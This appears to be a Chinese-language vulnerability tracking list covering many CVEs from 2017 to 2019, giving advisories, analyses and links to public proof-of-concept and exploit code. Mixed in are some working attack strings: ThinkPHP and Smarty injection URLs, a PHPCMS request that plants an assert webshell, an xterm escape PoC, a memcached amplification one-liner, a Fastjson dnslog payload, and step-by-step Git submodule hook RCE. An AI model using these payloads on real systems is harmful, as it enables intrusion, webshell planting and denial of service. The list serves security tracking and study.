- 官方补丁https://github.com/proftpd/proftpd/pull/816
- 官方漏洞信息http://bugs.proftpd.org/show_bug.cgi?id=4372
- 【2019-07-10】Fastjson反序列化命令执行,1.2.48以下Autotype绕过
- com.alibaba.fastjson.serializer.MiscCodec 定义了特定class的序列化与反序列化逻辑,包括java.lang.Class等。利用java.lang.Class可以实例化 com.sun.rowset.JdbcRowSetImpl。由于Fastjson的缓存特性,在利用com.sun.rowset.JdbcRowSetImpl进行JNDI注入时,直接从缓存表中取对象实例,则可以绕过autotype限制。
- PoC: https://raw.githubusercontent.com/kxcode/snippet/master/FastJson1.2.47.txt
- 检测:java.net.InetAddress类在fastjson 1.2.48中被加入了autotype黑名单,如果dnslog服务器成功收到请求,则说明目标fastjson版本低于1.2.48。Payload如下:
{"@type":"java.net.InetAddress","val":"inetaddress.fastjson.rxxoow.ceye.io"}
- WAF绕过:
@type
关键字可以用\u0040type
绕过 - 总结:https://www.freebuf.com/vuls/208339.html
- 【20190615】Weblogic漏洞CVE-2019-2725绕过
- TODO
- 【20190615】Windows NTLM认证漏洞CVE-2019-1040
- 【20190522】Windows10提权0day
- 【20190515】Windows RDP远程命令执行CVE-2019-0708 BlueKeep
- Windows RDP远程桌面存在远程命令执行漏洞。
- 影响:Windows XP/2003/7/Server 2008/Server 2008R2
- 漏洞分析:https://www.anquanke.com/post/id/178964
- 漏洞远程扫描:https://github.com/zerosum0x0/CVE-2019-0708
- 跟踪报道:https://www.anquanke.com/post/id/178966
- 漏洞分析:深信服千里目
- ZDI漏洞分析:https://www.thezdi.com/blog/2019/5/27/cve-2019-0708-a-comprehensive-analysis-of-a-remote-desktop-services-vulnerability
- 【20190418】Weblogic反序列化命令执行漏洞 CVE-2019-2725
- 公告:https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
- 预警:http://blog.nsfocus.net/weblogic-ns-2019-0015/
- 分析:https://www.anquanke.com/post/id/177381
- 老POC:未绕过CVE-2017-10271 https://github.com/No4l/MyTools/commit/9943385596143ac9e906354a7c1b42b5570e669f
- 新POC:Weblogic10 -> toplink, Weblogic12 -> slf4j ,通用:JNDI JdbcRowSetImpl
- 【20190406】Apache Confluence命令执行漏洞 CVE-2019-3395 CVE-2019-3396
- 公告:https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html
- 漏洞分析:https://paper.seebug.org/884/
- 描述:Confluence通常是一个用于企业内部的知识库和Wiki工具,在服务端模板渲染时存在漏洞,可导致任意文件读取、远程对象加载和RCE。漏洞点处在Widget Connector(小工具连接器)这个功能上。用户在创建文档时,可以在文章中嵌入一些视频、文档之类的(比如:Youtube视频、Flickr幻灯片、Google文档等内容),服务端会根据用户传入的远程资源URL进行渲染,此时用户可以手工传入
_template
参数,指定服务端模板文件,使服务端加载恶意的远程模板文件,在模板文件中利用Java反射达到命令执行的效果(模板引擎是velocity)。也可以将_template
设置为服务器上的文件,从而读取文件内容,如:/WEB-INF/web.xml
或者../web.xml
。 - POC https://github.com/kxcode/snippet/blob/master/CVE-2019-3396.md
- 影响范围: https://www.freebuf.com/news/200183.html
- 漏洞利用不需要登录
- 【20190403】Apache Http Server提权漏洞 CVE-2019-0211
- 【20190307】Apache Solr 命令执行漏洞 CVE-2019-0192
- POC https://github.com/mpgn/CVE-2019-0192
- Bug单 https://issues.apache.org/jira/browse/SOLR-13301
- 描述:攻击者可以通过Solr的HTTP Config API将Solr的JMX服务指向一个恶意的RMI服务,利用Solr不安全的反序列化功能,达到RCE的危害。
- 影响版本:5.0.0 ~ 5.5.5、6.0.0 ~ 6.6.5
- 安全版本:7.0
- 【20190307】Chrome ‘FileReader’ Use After Free命令执行漏洞CVE-2019-5786
- https://twitter.com/justinschuh/status/1103087046661267456
- 影响范围:Chrome < 72.0.3626.121 或者 Chromium < 74.0.3721.0
- 代码Diff:https://chromium.googlesource.com/chromium/src/+/150407e8d3610ff25a45c7c46877333c4425f062%5E%21/#F0
- 新闻报道:
- https://nakedsecurity.sophos.com/2019/03/06/serious-chrome-zero-day-google-says-update-right-this-minute/
- https://www.securityfocus.com/bid/107213
- https://www.solidot.org/story?sid=59806
- https://www.leiphone.com/news/201903/CzzG8lN74hZ3dUwK.html
- 漏洞分析 https://www.anquanke.com/post/id/173681
- POC https://github.com/exodusintel/CVE-2019-5786
- Exp https://github.com/exodusintel/Chromium-941743
- 【20190221】WinRAR命令执行漏洞CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, CVE-2018-20253
- Extracting a 19 Year Old Code Execution from WinRARhttps://research.checkpoint.com/extracting-code-execution-from-winrar/
- POC:https://github.com/Ridter/acefile
- 【20190220】Wordpress5.0.0命令执行漏洞
- 【20190213】Nexus Repository Manager 3 访问控制缺失及远程代码执行CVE-2019-7238
- 【20190213】runc Docker逃逸漏洞CVE-2019-5736
- 【20190124】Numpy库存在反序列化命令执行漏洞CVE-2019-6446
- 【20190122】apt/apt-get 远程命令执行漏洞披露(CVE-2019-3462)
- 【20190115】ThinkPHP 5.1~5.2 RCE漏洞
- ThinkPHP 5.0.x-5.0.23、5.1.x、5.2.x 全版本远程代码执行漏洞分析 http://blog.nsfocus.net/thinkphp-full-version-rce-vulnerability-analysis/
- POC合集:https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection
- 【20190110】xterm.js 命令执行漏洞CVE-2019-0542
- POC:
echo -e "abcdef\x1bP+qfoo;\ntouch /tmp/foo;aa\n\x1b\n"
- 在xterm终端下可逃逸并执行命令。利用场景:受害者执行curl http://xxx/xxx.txt,服务端返回的内容包含上述特殊字符,于是回显的数据逃逸了xterm的终端,并额外执行了命令。
- POC:
2018
- 【20181221】Windows越权任意文件读取0day
- 【20181220】微软发布补丁修复一个在野利用的IE漏洞 CVE-2018-8653
- 【20181210】ThinkPHP发布V5.1.31、V5.0.23安全更新,修复Getshell漏洞
- https://mp.weixin.qq.com/s?__biz=MjM5OTEzMzQwMA==&mid=2651667456&idx=1&sn=746ee2b9aa2b02f6ff60ff906ec2939a
- 受影响版本包括:V5.0.、V5.1.
- 修复的版本:V5.1.31、V5.0.23
- /public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=321
- /public/index.php?s=index/\think\view\driver\Php/display/%3E&content=aaa%3C?php%20phpinfo();?%3E
- 【20181205】Kubernetes API特权提升漏洞CVE-2018-1002105
- 【20181205】Flash命令执行漏洞CVE-2018-15982
- 【20181128】PHPCMS 2008 任意文件写入 RCE CVE-2018-19127
- 描述:发恶意包:
/type.php?template=tag_(){};@unlink(FILE);assert($_POST[1]);{//../rss
Shell落在这个文件:/cache_template/rss.tpl.php
内容:"@unlink(FILE);assert($_POST[1]);"
- http://www.yncert.org.cn/article/show/8119.html
- https://github.com/ab1gale/phpcms-2008-CVE-2018-19127
- 描述:发恶意包:
- 【20181127】Consul服务接口存在RCE漏洞
- 官方公告:https://www.hashicorp.com/blog/protecting-consul-from-rce-risk-in-specific-configurations
- 描述: Consul的早期版本中HTTP API没有进行访问控制,可以用来执行命令。Consul 和 zookeeper 及 etcd 类似常用于分布式系统,HashiCorp公司推出的开源工具,用于实现分布式系统的服务发现与配置。问题出在老版本的默认配置(新版本已经改成可选配置), server 和 client 会开放 8500 端口作为 web api,默认没有鉴权,v1/agent/service/register,v1/session/create 等接口都可用于执行命令。
- PoC:https://packetstormsecurity.com/files/150940/consul_service_exec.rb.txt
- 【20181113】严重,Exchange Server账号冒用,盗用任意用户邮件CVE-2018-8581
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8581
- POC:https://github.com/thezdi/PoC/tree/master/CVE-2018-8581
- POC:https://github.com/WyAtu/CVE-2018-8581
- 分析CVE-2018-8581:在Microsoft Exchange上冒充用户 https://www.anquanke.com/post/id/168337
- 分析CVE-2018-8581:https://xz.aliyun.com/t/3670
- 新的攻击手法,可以拿域控:https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
- 利用同样的方式拿到EWS Hash,通过这个Hash进行NTLM中继,攻击域控ldap,给指定用户提权,通过dscync导出人以用户Hash。
- 补丁:https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0686
- 【20181106】GOGS/Gitea任意代码执行(CVE-2018-18925/6)及利用流程
- 漏洞分析:https://xz.aliyun.com/t/3168 https://www.anquanke.com/post/id/163575
- Gogs 是一款极易搭建的自助 Git 服务。 Gogs 的目标是打造一个最简单、最快速和最轻松的方式搭建自助 Git 服务,使用 Go 语言开发。
- Gitea是从Gogs发展而来,同样的拥有极易安装,运行快速的特点,而且更新比Gogs频繁很多,维护的人也多。
- 【20181106】Struts 2.3.36使用了1.3.2版本的commons-fileupload组件,存在反序列化命令执行漏洞
- 描述:2017-06-20 Struts 2.5.12已经使用了1.3.3版本的commons-fileupload组件 <https://issues.apache.org/jira/browse/WW-4812
- US-CERT公告:https://www.us-cert.gov/ncas/current-activity/2018/11/05/Apache-Releases-Security-Advisory-Apache-Struts
- 开发者邮件:http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E
- NVD漏洞公告:2016-10-25 https://nvd.nist.gov/vuln/detail/CVE-2016-1000031
- 官方漏洞公告:2016-11-04 https://issues.apache.org/jira/browse/FILEUPLOAD-279
- 漏洞分析 By Tenable:https://www.tenable.com/security/research/tra-2016-12
- 漏洞分析:https://blog.spoock.com/2018/10/15/cve-2016-1000031/
- 影响版本:commons-fileupload 1.3.2及以下版本
- 时间线: 2014-02-07 FileUpload 1.3.1 发布 2016-05-26 FileUpload 1.3.2 发布 2016-10-25 NVD漏洞分析 https://nvd.nist.gov/vuln/detail/CVE-2016-1000031 2016-11-04 Commons FileUpload 官方公告 CVE-2016-1000031 https://issues.apache.org/jira/browse/FILEUPLOAD-279 2017-06-13 FileUpload 1.3.3 发布 2017-06-20 Struts 2.5.12 将内置commons-fileupload组件更新到1.3.3
- 描述:2017-06-20 Struts 2.5.12已经使用了1.3.3版本的commons-fileupload组件 <https://issues.apache.org/jira/browse/WW-4812
- 【20181019】Oracle Weblogic远程代码执行漏洞CVE-2018-3191
- 描述:这个漏洞利用的gadget是weblogic中自带的,跟JDK版本无关,所以只要系统能连外网,未禁止T3协议,漏洞就可以利用,威力巨大。
- 漏洞分析:https://www.anquanke.com/post/id/162274
- 【20181017】LibSSH 0.6及更高版本认证绕过漏洞
- https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/
- https://mp.weixin.qq.com/s/mzxaX6g6Iq0ihQwrf6l8Mw
- MSF Exploit
- 【20181010】GhostScript命令执行漏洞Bypass CVE-2018-17961
- 【20181009】CVE-2018-8453 Win32k Elevation of Privilege Vulnerability
- Zero-day exploit (CVE-2018-8453) used in targeted attacks https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/
- 【20181007】MikroTik RouterOS未授权文件读取到GetShell
- https://www.freebuf.com/vuls/187272.html
- 【20180930】GoogleProjectZero Linux内核提权 VMA-UAF 漏洞CVE-2018-17182
- https://github.com/jas502n/CVE-2018-17182
- Linux内存管理子系统中的缓存失效错误,导致释放后使用漏洞。
- 【20180919】交易前端图表通用JS组件 Tradingview 存在XSS漏洞
- POC:http://topbtc.com/tradingview/charting_library/static/tv-chart.e816a7a6edc9de3ed709.html#enabledFeatures=[]&disabledFeatures=[]&indicatorsFile=https://kingx.me/p/x.js
- 分析:通用K线展示JS库 TradingView 存在 XSS漏洞 https://mp.weixin.qq.com/s/yfbKf_5Nk2NXFl2-xlFqKg
- 漏洞文件:tv-chart.js 或者 library.xxxxxx.js
- 【20180912】Microsoft XML Core Services MSXML Remote Code Execution CVE-2018-8420
- POC:https://github.com/Theropord/CVE-2018-8420/
- 公告:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8420
- 实测PoC:https://github.com/kxcode/snippet/blob/master/CVE-2018-8420.md
- 描述:需要更改IE默认配置,IE安全设置-Internet区域,设置“对未标记为可安全执行脚本的ActiveX空间初始化并执行”为启用(不安全)。
- 【20180905】ECShop全版本命令执行漏洞
- 【20180829】Windows ALPC 本地提权 CVE-2018-8440
- https://www.kb.cert.org/vuls/id/906424
- https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar
- https://twitter.com/SandboxEscaper/status/1034125195148255235
- https://doublepulsar.com/task-scheduler-alpc-exploit-high-level-analysis-ff08cda6ad4f
- https://github.com/GossiTheDog/zeroday/tree/master/ALPC-TaskSched-LPE
- POC分析:http://www.qingpingshan.com/m/view.php?aid=394126
- 描述:提权之后,系统上会残留一些文件,C:\Windows\Tasks\UpdateTask.job、C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_4592475aca2acf83\Amd64\PrintConfig.dll。当新建excel,然后点击字体选择下拉选框按钮时,会触发执行。
- 【20180822】UEditor两个版本上传漏洞
- 【20180822】Struts2 命令执行漏洞 S2-057 CVE-2018-11776
- 【20180822】GhostScript沙盒绕过命令执行,影响ImageMagick CVE-2018-16509
- 【201808】Windows提权 CVE-2018-8120
- 【20180817】在野利用的 VBScript 引擎 UAF 漏洞 CVE-2018-8373
- https://blog.trendmicro.com/trendlabs-security-intelligence/use-after-free-uaf-vulnerability-cve-2018-8373-in-vbscript-engine-affects -internet-explorer-to-run-shellcode/
- https://www.freebuf.com/column/190504.html
- 利用CVE-2018-8373 0day漏洞的攻击与Darkhotel团伙相关的分析 https://ti.360.net/blog/articles/analyzing-attack-of-cve-2018-8373-and-darkhotel/
- 【20180815】OpenSSH用户枚举漏洞CVE-2018-15473
- 描述:OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。攻击者可通过发送特制的请求利用该漏洞枚举用户名称。
- POC:
- 【20180815】Microsoft Exchange Server 远程代码执行 CVE-2018-8302
- 【20180815】Intel CPU再爆芯片级漏洞 L1TF推测执行侧信道攻击漏洞 (L1 Terminal Fault Speculative)
- CVE:CVE-2018-3615、CVE-2018-3620、CVE-2018-3646
- Intel官方公告:https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00161.html
- 谷歌公告:https://cloud.google.com/blog/products/gcp/protecting-against-the-new-l1tf-speculative-vulnerabilities
- Intel分析:https://www.intel.com/content/www/us/en/architecture-and-technology/l1tf.html
- Xen公告:http://xenbits.xen.org/xsa/advisory-273.html
- RedHat公告:https://www.redhat.com/archives/rhsa-announce/2018-August/msg00012.html
- 【20180801】HP Ink Printers Remote Code Execution CVE-2018-5924, CVE-2018-5925
- 【20180808】Linux内核DoS漏洞 SegmentSmack CVE-2018-5390
- CVE-2018-5390
- 【20180725】Jenkens任意文件读取漏洞 CVE-2018-1999002
- 【20180718】Weblogic未授权任意文件上传 CVE-2018-2894
- 【20180718】Weblogic反序列化漏洞 CVE-2018-2893
- https://www.anquanke.com/post/id/152164
- 描述:CVE-2018-2628修复不完善,可以被绕过。
- https://github.com/tdy218/ysoserial-cve-2018-2628
- 【20180703】Wechat Pay SDK XXE漏洞
- 【20180604】Microsoft JScript命令执行漏洞 CVE-2018-8267
- 【20180605】Zip Slip漏洞
- 【20180601】 Git submodule RCE漏洞 CVE-2018-11235
- 描述:Git没有对子模块名称进行过滤,存在目录穿越漏洞。攻击者可以通过配置恶意的.gitmodules文件,将Git Hooks脚本文件推送到了客户端中,当用户在使用’git clone –recurse-submodules’时,触发RCE。
- 漏洞点说明:通过路径穿越,可以设置任意目录为子模块的
.git
目录。而在这一目录下放入hooks/post-checkout等恶意hooks脚本,即可达到RCE的效果。 - 漏洞分析:https://xz.aliyun.com/t/2371
- 漏洞分析:https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/
- 漏洞分析:https://atorralba.github.io/CVE-2018-11235/
- POC:https://github.com/Rogdham/CVE-2018-11235
- 影响范围: Git version < 2.13.7、Git version 2.14.x < 2.14.4、Git version 2.15.x < 2.15.2、Git version 2.16.x < 2.16.4、Git version 2.17.x < 2.17.1
- 修复版本:Git version 2.14.4、2.15.2、2.16.4、2.17.1
- 前置知识:
.git/hooks
文件夹下存放了Git Hooks脚本,本质上就是Shell脚本,在某些情况下会被Git调用。比如:在执行git checkout
时会自动调用post-checkout
脚本。这些Hooks脚本存放在客户端,clone项目时不会传递这些hook脚本。- 主项目根目录的子模块文件夹下有一个
.git
文件,文件内容是这个子模块的.git
目录路径。而这个路径通常指向了主项目的.git/modules
目录,该目录下每一个文件夹对应的存放了各个子模块的.git
目录的文件。而Git在解析.gitmodules
文件时,会把子模块的名称,拼接到.git/modules/
后面,当作子模块的.git
目录路径。也就是这里导致了本次RCE漏洞。 .gitmodules
文件说明:https://git-scm.com/docs/gitmodules- Git子模块工具:https://git-scm.com/book/en/v2/Git-Tools-Submodules
- 利用流程:
- 创建恶意项目
repo
- 添加一个恶意的子模块,命名为evil。
git submodule add some_repo_address evil
- 将目录
.git/modules/evil
拷贝到主项目根目录的testdir/evil
文件夹下。 - 往
testdir/evil
目录中的hooks目录添加恶意hook脚本。 - 配置
.gitmodules
,设置子模块的update参数为checkout,从而在子模块update时触发post-checkout脚本。(注:If you pass--recurse-submodules
to the git clone command, it will automatically initialize and update each submodule in the repository.) - 配置
.gitmodules
,使子模块的name
为../../testdir/evil
,使子模块的Git目录指向主项目根目录下的testdir/evil
。 - 受害者
git clone --recurse-submodules repo
时触发RCE。
- 创建恶意项目
- 【20180529】EOS节点代码执行漏洞
- 描述:EOS区块链系统在解析智能合约WASM文件时的一个越界写缓冲区溢出漏洞。攻击者可以上传恶意的智能合约至节点服务器,在节点服务器解析恶意合约后,攻击者就能够在节点服务器上执行任意代码并完全控制服务器。
- PR文章:https://mp.weixin.qq.com/s/nFBxMrl7QMeuFLt2AA6u4Q
- 漏洞分析:http://blogs.360.cn/blog/eos%E8%8A%82%E7%82%B9%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
- 复盘:https://mp.weixin.qq.com/s/rnZlocdFgA0g2CSDRv31Cw
- 【20180516】DHCP命令注入漏洞
- 【20180515】内核提权漏洞,程序员误读Intel文档 CVE-2018-8897 CVE-2018-1087
- 漏洞分析:https://mp.weixin.qq.com/s/xVudsIFermEYRJ7fN-qK-w
- Arbitrary code execution with kernel privileges using CVE-2018-8897
- PoC:https://github.com/can1357/CVE-2018-8897
- 【20180515】盘古发现ZipperDown漏洞
- 漏洞公告:https://mp.weixin.qq.com/s/SMpBQ4mZQLVLfgK7f84OYA
- 描述:WiFi劫持+解压+路径穿越
- 漏洞Issue:https://github.com/ZipArchive/ZipArchive/issues/453
- 【20180512】Node Security - macaddress模块存在命令执行漏洞
-
Node Security Platform Advisory https://nodesecurity.io/advisories/654 - 报告:https://hackerone.com/reports/319467
-
-
**【20180508】CVE-2018-0824 Microsoft Windows COM 远程命令执行漏洞** - 该漏洞可远程调用一个计算机上的COM组件,根据内容分析,作者给出的POC无法对远程主机进行复现,是由于在调用CoGetInstanceFromIStorage()时未传递计算机名(COSERVERINFO),我们可以将调用COM组件的程序嵌入office或网页中,也能够获取目标主机的系统权限。
- 影响:Microsoft Windows Server 2008 Microsoft Windows Server 2008 R2 Microsoft Windows 7 Microsoft Windows Windows Server 2012 Microsoft Windows 8.1 Microsoft Windows Server 2012 R2 Microsoft Windows RT 8.1 Microsoft Windows 10 Microsoft Windows Server 2016
- 分析文章:https://codewhitesec.blogspot.com/2018/06/cve-2018-0624.html
- 【20180508】Windows VBScript引擎远程执行代码漏洞 CVE-2018-8174
- 描述:VBScript引擎处理内存中对象的方式中存在一个远程执行代码漏洞。该漏洞可能以一种攻击者可以在当前用户的上下文中执行任意代码的方式来破坏内存。成功利用此漏洞的攻击者可以获得与当前用户相同的用户权限。
- https://www.freebuf.com/column/188622.html
- 【20180502】7-Zip命令执行漏洞(CVE-2018-10115)
- 【20180418】Weblogic 反序列化远程代码执行漏洞 CVE-2018-2628
- 【20180410】SpringDataCommons RCE漏洞 CVE-2018-1270
- 【20180406】SpringMessaging RCE漏洞 CVE-2018-1270
- 描述:SPEL表达式注入。使用spring-messaging模块开放的STOMP协议的Websocket Broker服务存在漏洞。
- 分析复现:https://xz.aliyun.com/t/2252
- 官方公告:https://pivotal.io/security/cve-2018-1270
- 修复:需更新Spring框架到5.0.5、4.3.16及以上(4.3.15版本未修复,需要升级到4.3.16版本及以上)
- 补丁绕过:https://pivotal.io/security/cve-2018-1275
- 【20180328】Drupal代码执行漏洞(CVE-2018-7600)
- PoC:https://github.com/dreadlocked/Drupalgeddon2/blob/master/drupalgeddon2.rb
- 描述:Drupal 使用 # 开头的变量作为内部表达式使用的变量,但未考虑到用户请求中可构造该类型变量,在多个函数调用中可能导致任意代码执行漏洞。
- 影响:小于 7.58 的所有 7.* 版本、小于 8.5.1 的所有 8.* 版本、已停止维护的 6.* 版本
- 修复:7.* 升级到 7.58 https://www.drupal.org/project/drupal/releases/7.58
- 修复:8.* 升级到 8.5.1 https://www.drupal.org/project/drupal/releases/8.5.1
- 修复:6.* 和 8.3、8.4 已经停止维护,建议升级到 8.5.1 或 7.5.8
- 公告:https://www.drupal.org/sa-core-2018-002
- 【20180406】Windows提权 TotalMeltdown
- WindowsCPU补丁导致一个新的提权漏洞
- 【20180330】思科Cisco SmartInstallClient缓冲区溢出漏洞及多个严重漏洞CVE-2018-0171,默认口令CVE-2018-0150
- 漏洞发现者博客:https://embedi.com/blog/cisco-smart-install-remote-code-execution/
- 思科安全公告:https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
- 长亭预警:http://mp.weixin.qq.com/s/6KmpLlnsyiTKGu6GkCmXDg
- 同程预警:http://mp.weixin.qq.com/s/cMYUuGFmox5PK89fO_eR8w
- 探测PoC:https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py
- 协议特征:https://github.com/rapid7/metasploit-framework/commit/c67e407c9c5cd28d555e1c2614776e05b628749d
- Exploit: https://github.com/Sab0tag3d/SIET
- 另外还有一个默认口令的漏洞:https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-xesc 据说是 cisco/$un7zu
- 【20180329】Drupal核心远程代码执行
- 漏洞预警: Drupalgeddon2-Drupal核心远程代码执行
- PoC: 暂无
- 【20180316】Ubuntu1604提权漏洞, 漏洞相关: CVE-2017-16995
- 讨论: https://news.ycombinator.com/item?id=16597800
- 描述: 2017年12月,Google P0团队发现4.14分支以后eBPF存在漏洞https://www.cvedetails.com/cve/CVE-2017-16995/。内核主线4.14之后版本都已经修复漏洞,但4.4分支也存在类似漏洞未修复。
- Exploit: http://cyseclabs.com/exploits/upstream44.c
- 相关历史漏洞的修复: https://github.com/torvalds/linux/commit/95a762e2c8c942780948091f8f2a4f32fce1ac6f
- 相关历史漏洞: https://bugs.chromium.org/p/project-zero/issues/detail?id=1454&desc=3
- 触发条件:
- CONFIG_BPF_SYSCALL 打开,可以调用bpf syscall
- /proc/sys/kernel/unprivileged_bpf_disabled 设置为0
- 漏洞分析: https://mp.weixin.qq.com/s/PgyKiEpGzNJFX6FwmJcR0A
- 漏洞分析: https://xianzhi.aliyun.com/forum/topic/2212
- 修复: echo “deb http://archive.ubuntu.com/ubuntu/ xenial-proposed restricted main multiverse universe” > /etc/apt/sources.list && apt update && apt install linux-image-4.4.0-117-generic
- 【20180315】CredSSP MS-RDP漏洞?
- 【20180307】Adobe Acrobat ReaderPDF远程代码执行漏洞
- 【20180301】Memcache DDoS反射放大攻击
- 安全预警:https://cert.360.cn/warning/detail?id=c63eb87058834e37c7c112c35ef5f9fd
- 漏洞分析:基于Memcached分布式系统DRDoS拒绝服务攻击技术研究http://blog.csdn.net/microzone/article/details/79262549
- 漏洞描述:利用memcache 11211端口作为DRDoS放大器,可将流量放大五万倍左右。向未鉴权的Memcache中插入大量数据,并伪造源IP进行读取操作,从而进行反射放大攻击。
- 相关报道:https://thehackernews.com/2018/03/biggest-ddos-attack-github.html
-
PoC: python -c “print ‘\0\x01\0\0\0\x01\0\0stats\r\n’” nc -nvvu x.x.x.x 11211 >/tmp/null - PoC: https://github.com/kxcode/snippet/blob/master/memcache-reflect.txt
- 【20180201】Adobe Flash 缓冲区溢出漏洞 CVE-2018-4878
- 描述:2月1日,Adobe官方发布了Adobe Flash Player系列产品的安全通告(APSA18-01),一个最新的Adobe Flash零日漏洞被发现针对韩国地区的人员发起攻击,该0day漏洞编号为CVE-2018-4878,目前最新版本28.0.0.137及其以前版本的Adobe Flash Player均受漏洞影响,Adobe官方将于2月5日发布漏洞补丁
- CVE: CVE-2018-4878
- PoC: https://github.com/vysec/CVE-2018-4878
- PoC: https://github.com/anbai-inc/CVE-2018-4878
- 分析报告: https://mp.weixin.qq.com/s/zJm-mr5-U5sBHdc3Qlx_3Q
- 相关报道: CVE-2018-4878 (Flash Player up to 28.0.0.137) and Exploit Kits
- 【201802】Wordpress全版本DoS漏洞
- CVE-2018-6389
- 漏洞影响范围: 全版本,官方没有发补丁
- 漏洞描述:漏洞是一个应用程序级别的 DoS攻击问题,该漏洞出现在load-scripts.php文件中,load-scripts.php文件是为WordPress管理员设计的,允许将多个JavaScript文件加载到一个请求中,通过技术分析发现可以在登录之前调用该函数来允许任何人调用它,并通过少量请求返回大数据,造成服务器资源消耗,从而导致DoS攻击。
- PoC: https://github.com/WazeHell/CVE-2018-6389/blob/master/CVE-2018-6389.py
-
PoC: CC攻击这个URL,https://example.com/wp-admin/load-scripts.php?c=1&load[]=jquery-ui-core&ver=4.9.1
load[]参数可以填如下值:eutil,common,wp-a11y,sack,quicktag,….(可参考github上的PoC)
- 【20180128】PHP的GD库DoS漏洞
- 分析文章:https://www.toutiao.com/i6514551846428738055/
- 漏洞信息:https://nvd.nist.gov/vuln/detail/CVE-2018-5711
- 漏洞信息:https://bugs.php.net/bug.php?id=75571
- 影响范围:PHP 5< PHP 5.6.33, PHP 7.0<PHP 7.0.27, PHP 7.1<PHP 7.1.13, PHP 7.2<PHP 7.2.1
- 测试文章:https://m.toutiao.com/i6514551846428738055/
-
【20180124】Electron 命令执行
-
【20180101】谷歌发现暴雪DNS Rebind漏洞
- 【20180124】SmartyPHP模板引擎命令执行RCE漏洞
- 分析文章:https://xianzhi.aliyun.com/forum/topic/1983
- 组件指纹:smarty_internal_runtime_codeframe.php 存在这个文件说明使用smarty
- 修复判断:如果文件内容没有
str_replace('*/','* /',$_template->source->filepath)
说明没有修复 - 扫描用例:
http://smart-y.teaser.insomnihack.ch/console.php?id=*/phpinfo();/*
- 【20180123】Office命令执行漏洞 CVE-2018-0802
- 描述:CVE-2017-11882补丁的绕过
- 分析:http://www.freebuf.com/vuls/160386.html
- 【20180118】Libc Realpath缓冲区溢出漏洞(CVE-2018-1000001),Linux提权漏洞
- 影响范围:影响Redhat、Debian、Ubuntu、Suse等Linux发行版本,理论上Linux内核版本大于或等于2.6.36均受影响
- 参考文章:https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
- 参考文章:https://mp.weixin.qq.com/s/x69eDc8ke0wcUcwRdhsk4Q
- PoC: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
- 【20180104】Intel等CPU存在边信道内存泄露漏洞: Meltdoan,Spectre
- Meltdown攻击: CVE-2017-5753、CVE-2017-5715
- Spectre攻击: CVE-2017-5754
- 安天分析报告: 处理器A级漏洞Meltdown(熔毁)和Spectre(幽灵)分析
- 官方Paper: https://spectreattack.com/spectre.pdf
- 官方Paper: https://meltdownattack.com/meltdown.pdf
- 官方博客: https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html
- PoC: https://github.com/turbo/KPTI-PoC-Collection
- PoC: https://github.com/Eugnis/spectre-attack
- PoC: https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6#file-spectre-c
- 各厂商公告汇总: https://isc.sans.edu/diary/23193
- 各厂商补丁地址: https://github.com/hannob/meltdownspectre-patches
- 微软补丁: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180002
- 微软补丁: https://portal.msrc.microsoft.com/zh-cn/security-guidance/releasenotedetail/858123b8-25ca-e711-a957-000d3a33cf99
- Xen公告: http://xenbits.xen.org/xsa/advisory-254.html?from=timeline
- 补丁后续: Azure虚拟机打上Meltdown补丁更新后,真的被搞瘫痪了!
- 相关文章: Intel回应CPU内核漏洞:别只盯着我们! ARM中枪,AMD躺枪
- 在线监测:http://xlab.tencent.com/special/spectre/spectre_check.html
- 缓解措施:http://mp.weixin.qq.com/s/Bdc58fRJO4nFzCHnO5WIYQ
- 后续报道:http://www.freebuf.com/news/160854.html
2017
- 【20171222】Weblogic WLS组件 XMLDecoder反序列化漏洞 CVE-2017-10271
- 近期Weblogic的一个RCE漏洞在野被爆发式利用,多用于植入挖矿程序。
- 近期大量WebLogic主机感染挖矿病毒
- 分析:https://www.ren-isac.net/public-resources/alerts/REN-ISAC_ADVISORY_Oracle_WebLogic_Vulnerability_Bitcoin_Miner_Attacks_20180105v1.pdf
- https://x.threatbook.cn/nodev4/vb4/waparticle?threatInfoID=271
- 官方补丁公告:Oracle 201710重要安全公告
- XMLDecoder反序列化漏洞是一个历史漏洞,PoC:https://github.com/pwntester/XMLDecoder
- Weblogic wls-wsat 包中也存在这个反序列化漏洞,PoC:https://github.com/kxcode/snippet/blob/master/Weblogic-CVE-2017-10271.txt
- 【20171219】GoAhead服务器CGI存在LD_PRELOAD命令执行漏洞 CVE-2017-17562
- 影响范围:3.6.5以下版本的GoAhead,开启CGI脚本支持
